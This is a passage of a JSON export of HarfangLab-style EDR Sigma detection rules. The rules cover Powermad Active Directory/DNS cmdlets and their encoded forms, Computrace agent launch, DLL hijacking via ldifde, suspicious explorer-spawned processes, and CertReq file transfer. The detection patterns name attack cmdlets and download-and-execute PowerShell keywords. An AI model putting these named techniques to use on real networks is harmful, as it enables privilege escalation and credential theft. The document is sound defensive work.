selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_cmdlet:\n CommandLine|contains:\n # ================================== Machine Account Quota functions ==================================\n # Return machine account attributes.\n - 'Get-MachineAccountAttribute'\n - 'RwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'cAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEEAdAB0AHIAaQBiAHUAdABlA'\n - 'HAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABBAHQAdAByAGkAYgB1AHQAZQ'\n # Returns Machine Account Creator. Usually only set when the node was created by an unprivileged user.\n - 'Get-MachineAccountCreator'\n - 'RwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQwByAGUAYQB0AG8Acg'\n - 'cAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEMAcgBlAGEAdABvAHIA'\n - 'HAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABDAHIAZQBhAHQAbwByA'\n # Disables a machine account.\n - 'Disable-MachineAccount'\n - 'RABpAHMAYQBiAGwAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n - 'QAaQBzAGEAYgBsAGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'EAGkAcwBhAGIAbABlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n # Enables a machine account.\n - 'Enable-MachineAccount'\n - 'RQBuAGEAYgBsAGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'UAbgBhAGIAbABlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'FAG4AYQBiAGwAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Creates a new machine account through an encrypted LDAP request. Can then be used with the `runas` command.\n - 'New-MachineAccount'\n - 'TgBlAHcALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - '4AZQB3AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'OAGUAdwAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Removes a machine account with a privileged account.\n - 'Remove-MachineAccount'\n - 'UgBlAG0AbwB2AGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'IAZQBtAG8AdgBlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'SAGUAbQBvAHYAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Set attributes for an account that was created with Powermad.\n - 'Set-MachineAccountAttribute'\n - 'UwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'MAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEEAdAB0AHIAaQBiAHUAdABlA'\n - 'TAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABBAHQAdAByAGkAYgB1AHQAZQ'\n # Recursively creates Machine Accounts, allowed due to the Transitive Machine Account Quota and updates of the ms-DS-CreatorSID attribute.\n - 'Invoke-AgentSmith'\n - 'SQBuAHYAbwBrAGUALQBBAGcAZQBuAHQAUwBtAGkAdABoA'\n - 'kAbgB2AG8AawBlAC0AQQBnAGUAbgB0AFMAbQBpAHQAaA'\n - 'JAG4AdgBvAGsAZQAtAEEAZwBlAG4AdABTAG0AaQB0AGgA'\n # ========================================= ADIDNS Functions ==========================================\n # Used to add or delete ADIDNS dynamic DNS records if secure dynamic updates are configured on a DC.\n - 'Invoke-DNSUpdate'\n - 'SQBuAHYAbwBrAGUALQBEAE4AUwBVAHAAZABhAHQAZQ'\n - 'kAbgB2AG8AawBlAC0ARABOAFMAVQBwAGQAYQB0AGUA'\n - 'JAG4AdgBvAGsAZQAtAEQATgBTAFUAcABkAGEAdABlA'\n # Tombstone an ADIDNS node.\n - 'Disable-ADIDNSNode'\n - 'RABpAHMAYQBiAGwAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n - 'QAaQBzAGEAYgBsAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'EAGkAcwBhAGIAbABlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n # Revive tombstoned node.\n - 'Enable-ADIDNSNode'\n - 'RQBuAGEAYgBsAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'UAbgBhAGIAbABlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'FAG4AYQBiAGwAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Return values that populate a node attribute.\n - 'Get-ADIDNSNodeAttribute'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAEEAdAB0AHIAaQBiAHUAdABlA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'HAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUAQQB0AHQAcgBpAGIAdQB0AGUA'\n # Returns the owner of a node.\n - 'Get-ADIDNSNodeOwner'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAE8AdwBuAGUAcg'\n - 'cAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBPAHcAbgBlAHIA'\n - 'HAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUATwB3AG4AZQByA'\n # Gets a DACL (Discretionary Access Control List, which users/groups can access an object) of an ADIDNS node or zone.\n - 'Get-ADIDNSPermission'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'HAGUAdAAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n # Returns ADIDNS zones.\n - 'Get-ADIDNSZone'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBaAG8AbgBlA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMAWgBvAG4AZQ'\n - 'HAGUAdAAtAEEARABJAEQATgBTAFoAbwBuAGUA'\n # Adds access (ACE) to a node or zone DACL.\n - 'Grant-ADIDNSPermission'\n - 'RwByAGEAbgB0AC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'cAcgBhAG4AdAAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n - 'HAHIAYQBuAHQALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n # Creates a new node thorugh an encrypted LDAP request.\n - 'New-ADIDNSNode'\n - 'TgBlAHcALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - '4AZQB3AC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'OAGUAdwAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Creates a valid byte array for the dnsRecord attribute.\n - 'New-DNSRecordArray'\n - 'TgBlAHcALQBEAE4AUwBSAGUAYwBvAHIAZABBAHIAcgBhAHkA'\n - '4AZQB3AC0ARABOAFMAUgBlAGMAbwByAGQAQQByAHIAYQB5A'\n - 'OAGUAdwAtAEQATgBTAFIAZQBjAG8AcgBkAEEAcgByAGEAeQ'\n # Gets an SOA (Start of authority) serial number for a DNS zone and increments it.\n - 'New-SOASerialNumberArray'\n - 'TgBlAHcALQBTAE8AQQBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgBBAHIAcgBhAHkA'\n - '4AZQB3AC0AUwBPAEEAUwBlAHIAaQBhAGwATgB1AG0AYgBlAHIAQQByAHIAYQB5A'\n - 'OAGUAdwAtAFMATwBBAFMAZQByAGkAYQBsAE4AdQBtAGIAZQByAEEAcgByAGEAeQ'\n # Renames a node.\n - 'Rename-ADIDNSNode'\n - 'UgBlAG4AYQBtAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'IAZQBuAGEAbQBlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'SAGUAbgBhAG0AZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Removes a node.\n - 'Remove-ADIDNSNode'\n - 'UgBlAG0AbwB2AGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'IAZQBtAG8AdgBlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'SAGUAbQBvAHYAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Removes an ACE from a DACL.\n - 'Revoke-ADIDNSPermission'\n - 'UgBlAHYAbwBrAGUALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n - 'IAZQB2AG8AawBlAC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'SAGUAdgBvAGsAZQAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n # Appends or overwrites node attributes.\n - 'Set-ADIDNSNodeAttribute'\n - 'UwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAEEAdAB0AHIAaQBiAHUAdABlA'\n - 'MAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'TAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUAQQB0AHQAcgBpAGIAdQB0AGUA'\n # Sets the owner of a Node, SeRestorePrivilege token required.\n - 'Set-ADIDNSNodeOwner'\n - 'UwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAE8AdwBuAGUAcg'\n - 'MAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBPAHcAbgBlAHIA'\n - 'TAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUATwB3AG4AZQByA'\n # Generating Kerberos AES-256 and 128 Keys for know username and password, this can be used as a PtH attack in InvokeDNSUPdate\n - 'Get-KerberosAESKey'\n - 'RwBlAHQALQBLAGUAcgBiAGUAcgBvAHMAQQBFAFMASwBlAHkA'\n - 'cAZQB0AC0ASwBlAHIAYgBlAHIAbwBzAEEARQBTAEsAZQB5A'\n - 'HAGUAdAAtAEsAZQByAGIAZQByAG8AcwBBAEUAUwBLAGUAeQ'\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2fd97120-c808-466a-81ed-6aabf72403a2", "rule_name": "Malicious PowerShell Powermad Commandlets in Command-line", "rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\nThe Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the PowerShell host process.\n", "rule_creation_date": "2022-10-12", "rule_modified_date": "2025-04-10", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.collection", "attack.credential_access", "attack.defense_evasion", "attack.execution", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1550.002", "attack.t1557.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2fe027bc-7a3c-412a-9493-8581215d5157", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.606892Z", "creation_date": "2026-03-23T11:45:34.606895Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.606903Z", "rule_level": "low", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://securelist.com/absolute-computrace-revisited/58278/", "https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf", "https://attack.mitre.org/techniques/T1569/002/" ], "name": "t1569_002_computrace_rpcnetp.yml", "content": "title: Computrace Agent Started\nid: 2fe027bc-7a3c-412a-9493-8581215d5157\ndescription: |\n Detects the execution of rpcnet.exe or rpcnetp.exe which is the Computrace Agent (Communication Driver Agent).\n Computrace (aka LoJack) is an Absolute Sotfware solution used to trace stolen laptops.\n Attackers can use Computrace a backdoor that can survive a reinstallation of the whole OS.\n It recommended to disable this rule if the IT covered by HarfangLab EDR legitimately uses Computrace as an anti-theft solution.\n If the IT does not use Computrace, it is recommended to analyze the behavior of the launched binary to look for malicious actions or network connections.\nreferences:\n - https://securelist.com/absolute-computrace-revisited/58278/\n - https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2022/09/02\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Computrace\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image:\n - '?:\\Windows\\System32\\rpcnetp.exe'\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n ParentImage: '?:\\Windows\\System32\\services.exe'\n condition: selection\nlevel: low\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2fe027bc-7a3c-412a-9493-8581215d5157", "rule_name": "Computrace Agent Started", "rule_description": "Detects the execution of rpcnet.exe or rpcnetp.exe which is the Computrace Agent (Communication Driver Agent).\nComputrace (aka LoJack) is an Absolute Sotfware solution used to trace stolen laptops.\nAttackers can use Computrace a backdoor that can survive a reinstallation of the whole OS.\nIt recommended to disable this rule if the IT covered by HarfangLab EDR legitimately uses Computrace as an anti-theft solution.\nIf the IT does not use Computrace, it is recommended to analyze the behavior of the launched binary to look for malicious actions or network connections.\n", "rule_creation_date": "2022-09-02", "rule_modified_date": "2025-01-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1569.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2ffd5e79-150c-4383-847e-9e74ca72179a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.599622Z", "creation_date": "2026-03-23T11:45:34.599625Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.599633Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_ldifd.yml", "content": "title: DLL Hijacking via ldifd.exe\nid: 2ffd5e79-150c-4383-847e-9e74ca72179a\ndescription: |\n Detects potential Windows DLL Hijacking via ldifd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ldifde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2ffd5e79-150c-4383-847e-9e74ca72179a", "rule_name": "DLL Hijacking via ldifd.exe", "rule_description": "Detects potential Windows DLL Hijacking via ldifd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "3032fc60-f2f1-46ff-98c0-f6b537fe7513", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.626639Z", "creation_date": "2026-03-23T11:45:34.626641Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.626646Z", "rule_level": "high", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/", "https://www.zscaler.com/blogs/security-research/steal-it-campaign", "https://attack.mitre.org/techniques/T1204/001/", "https://attack.mitre.org/techniques/T1204/002/" ], "name": "t1204_001_suspicious_process_parent_explorer.yml", "content": "title: Suspicious Process Started by Explorer\nid: 3032fc60-f2f1-46ff-98c0-f6b537fe7513\ndescription: |\n Detects the execution of suspicious processes spawned directly by explorer.exe, which commonly indicates that a user has clicked on a malicious link or attachment.\n This pattern is frequently observed in phishing attacks where malicious files or URLs trigger the execution of dangerous processes like powershell.exe, cmd.exe, or unusual script interpreters with explorer.exe as the parent.\n It is recommended to analyze the process command-line and file origin (by looking at the file downloads telemetry, for example).\nreferences:\n - https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1204/001/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2021/06/18\nmodified: 2026/01/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.001\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_explorer:\n ParentImage|endswith: '\\explorer.exe'\n\n # cmd.exe\n selection_cmd:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.Exe'\n\n selection_cmd_1_1:\n CommandLine|contains : '/c '\n\n selection_cmd_1_2:\n CommandLine|contains:\n - '%comspec% '\n - 'cmd.exe /c start '\n - 'cmd.exe /c ?start '\n - 'attrib '\n - 'mshta '\n - 'findstr '\n\n selection_cmd_2_1:\n CommandLine|contains: '/c '\n\n selection_cmd_2_2:\n CommandLine|contains:\n - 'powershell'\n - 'p^o^w^e^r^s^h^e^l^l'\n\n selection_cmd_2_3:\n CommandLine|contains:\n - 'bypass '\n - 'WriteAllbytes'\n - 'FromBase64String'\n - ' iex '\n\n exclusion_cmd:\n CommandLine|contains:\n - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '* ?:\\Windows\\system32\\ie4uinit.exe -ClearIconCache'\n - 'cmd.exe /c start cmd.exe /k pushd '\n - '?:\\Windows\\System32\\cmd.exe /c start shell:AppsFolder\\Microsoft.MicrosoftEdge_?????????????!MicrosoftEdge -private'\n - '?:\\Windows\\System32\\cmd.exe /c start /min /d ?:\\Users\\\\*\\AppData\\Local\\PDFProSuite PDFProSuite . --update'\n\n # powershell.exe\n selection_powershell_image:\n - Image|endswith: 'powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_powershell_commandline:\n CommandLine|contains:\n - 'DownloadFile'\n - 'DownloadString'\n - 'invoke-webrequest'\n - 'iwr'\n - '-join'\n - '-replace '\n - 'Start-Process rundll32'\n - 'Expand-Archive '\n - '::ReadAllBytes(*::WriteAllBytes('\n - ' -WindowStyle Hidden *Start-Process ?:\\' # C:\\\n - ' -WindowStyle Hidden *Start-Process ??:\\' # 'C:\\\n\n exclusion_powershell:\n CommandLine|contains:\n - ' Process Bypass '\n - ' -file ?:\\'\n - ' -file \"\\\\\\\\'\n - ' -command ?:\\'\n - \"}) -replace '\\\\s\\\\s+',\"\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy ByPass -NoExit -Command & ??:\\\\*\\anaconda3\\shell\\condabin\\conda-hook.ps1? ; conda activate ??:\\\\*\\anaconda3?'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy ByPass -NoExit -Command & ??:\\Users\\\\*\\Miniconda3\\shell\\condabin\\conda-hook.ps1? ; conda activate ??:\\\\*\\Miniconda3'\n - \"?:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command & '?:\\\\Program Files (x86)\\\\LastPass\\\\AppxUpgradeEdge.ps1'\"\n\n # mshta.exe\n selection_mshta_image:\n - Image|endswith: '\\mshta.exe'\n - OriginalFileName: 'MSHTA.EXE'\n\n selection_mshta_commandline:\n CommandLine|contains:\n - 'http'\n - 'javascript'\n\n # wmic.exe\n selection_wmic_image:\n - Image|endswith: 'wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_wmic_commandline:\n CommandLine|contains: 'format'\n\n # msiexec.exe\n selection_msiexec_image:\n - Image|endswith: 'msiexec.exe'\n - OriginalFileName: 'msiexec.exe'\n\n selection_msiexec_commandline:\n CommandLine|contains: '/q '\n\n # rundll32.exe\n selection_rundll32:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_rundll32_1:\n CommandLine|contains: '%comspec% '\n selection_rundll32_2:\n CommandLine|contains|all:\n - 'vfcuzzz.dll'\n - 'CuzzSetDebugLoweringPoint'\n selection_rundll32_3:\n CommandLine|contains|all:\n - 'KM.FileSystem.dll'\n - 'KMGetInterface'\n selection_rundll32_4:\n CommandLine|contains|all:\n - 'diassvcs.dll'\n - 'InitializeComponent'\n selection_rundll32_5:\n CommandLine|contains|all:\n - 'GraphicalComponent.dll'\n - 'VisualServiceComponent'\n selection_rundll32_6:\n CommandLine|contains|all:\n - 'MsDiskMountService.dll'\n - 'DiskDriveIni'\n selection_rundll32_7:\n CommandLine|contains|all:\n - 'advpack.dll'\n - 'RegisterOCX'\n selection_rundll32_8:\n CommandLine|contains|all:\n - '\\\\\\\\'\n - ',0'\n selection_rundll32_9:\n CommandLine|contains|all:\n - 'alomart.dll'\n - 'PluginInit'\n\n # wscript.exe\n selection_wscript_image:\n - Image|endswith: '\\wscript.exe'\n - OriginalFileName: 'wscript.exe'\n\n selection_wscript_commandline:\n CommandLine|contains: ' /b '\n\n # odbcconf.exe\n selection_odbcconf_image:\n - Image|endswith: '\\odbcconf.exe'\n - OriginalFileName: 'odbcconf.exe'\n\n selection_odbcconf_commandline:\n CommandLine|contains:\n - 'odbcconf '\n - 'odbcconf.exe '\n\n condition: selection_explorer and (\n (selection_cmd and (all of selection_cmd_1_* or all of selection_cmd_2_*) and not exclusion_cmd) or\n (all of selection_powershell_* and not exclusion_powershell) or\n (all of selection_mshta_*) or\n (all of selection_wmic_*) or\n (all of selection_msiexec_*) or\n (selection_rundll32 and 1 of selection_rundll32_*) or\n (all of selection_wscript_*) or\n (all of selection_odbcconf_*)\n )\nlevel: high\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "3032fc60-f2f1-46ff-98c0-f6b537fe7513", "rule_name": "Suspicious Process Started by Explorer", "rule_description": "Detects the execution of suspicious processes spawned directly by explorer.exe, which commonly indicates that a user has clicked on a malicious link or attachment.\nThis pattern is frequently observed in phishing attacks where malicious files or URLs trigger the execution of dangerous processes like powershell.exe, cmd.exe, or unusual script interpreters with explorer.exe as the parent.\nIt is recommended to analyze the process command-line and file origin (by looking at the file downloads telemetry, for example).\n", "rule_creation_date": "2021-06-18", "rule_modified_date": "2026-01-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1204.001", "attack.t1204.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "30336e99-9891-408e-b3a7-c5f83d445417", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.603534Z", "creation_date": "2026-03-23T11:45:34.603537Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.603545Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Certreq", "https://attack.mitre.org/techniques/T1105/" ], "name": "t1105_certreq_lolbas_file_transfer.yml", "content": "title: File Downloaded or Uploaded via CertReq\nid: 30336e99-9891-408e-b3a7-c5f83d445417\ndescription: |\n Detects a suspicious execution of the CertReq executable to download or exfiltrate a file.\n Adversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\n It is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certreq\n - https://attack.mitre.org/techniques/T1105/\ndate: 2025/06/17\nmodified: 2025/06/17\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.CertReq\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\CertReq.exe'\n # Renamed binaries\n - OriginalFileName: 'CertReq.exe'\n\n selection_cmdline:\n CommandLine|contains|all:\n - '?Post'\n - '?config'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "30336e99-9891-408e-b3a7-c5f83d445417", "rule_name": "File Downloaded or Uploaded via CertReq", "rule_description": "Detects a suspicious execution of the CertReq executable to download or exfiltrate a file.\nAdversaries may transfer tools or 